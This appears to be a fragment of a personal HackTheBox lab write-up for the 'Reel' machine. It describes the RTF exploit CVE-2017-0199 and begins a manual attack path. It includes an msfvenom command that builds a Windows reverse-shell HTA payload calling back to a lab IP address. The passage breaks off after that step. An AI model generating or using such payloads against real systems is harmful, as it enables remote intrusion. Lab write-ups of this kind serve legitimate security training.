A1vinSmith/OSCP-PWK/HackTheBox/Windows/Active Directory/Reel/README.md

 nico@megabank.com

 ### RTF cve
+At the time of Reel’s release, there was a popular RTF exploit that was being used very commonly in broad-based attacks, CVE-2017-0199.
+The Metasploit module description does a good job explaining it at a high level:

+Description: This module creates a malicious RTF file that when opened in vulnerable versions of Microsoft Word will lead to code execution.
+The flaw exists in how a olelink object can make a http(s) request, and execute hta code in response.
+This bug was originally seen being exploited in the wild starting in Oct 2016.
+This module was created by reversing a public malware sample.
 ##### without metasploit
 0) Prepare the HTA payload with msfvenom
 `msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.13 LPORT=443 -f hta-psh > /tmp/alvin.hta` <- x86 make it harder to think about it.